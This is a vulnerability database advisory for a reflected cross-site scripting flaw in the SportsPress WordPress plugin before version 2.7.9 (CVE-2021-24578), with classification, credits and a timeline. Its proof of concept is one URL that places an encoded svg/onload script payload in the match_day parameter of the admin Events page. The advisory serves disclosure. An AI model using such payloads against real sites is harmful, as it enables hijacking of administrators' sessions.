WordPress Plugin Vulnerabilities

SportsPress < 2.7.9 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape its match_day parameter before outputting back in the Events backend page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=sp_event&match_day=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22

Affects Plugins

Plugin icon
sportspress
Fixed in 2.7.9

References

CVE
CVE-2021-24578

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
iohex
Submitter
iohex
Submitter twitter
iohehe
Verified
Yes
WPVDB ID
69351798-c790-42d4-9485-1813cd325769

Timeline

Publicly Published
2021-11-16 (about 2 years ago)
Added
2021-11-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2021-04-26
Title
Store Locator Plus < 5.9 - Unauthenticated Stored XSS
Published
2023-03-16
Title
Mediciti Lite <= 1.3.0 - Reflected XSS
Published
2023-05-11
Title
BuddyForms < 2.8.2 - Contributor+ Stored XSS
Published
2023-11-29
Title
Doofinder for WooCommerce < 2.1.8 - Reflected Cross-Site Scripting
Published
2023-12-29
Title
Auto Amazon Links < 5.1.2 - Contributor+ Stored XSS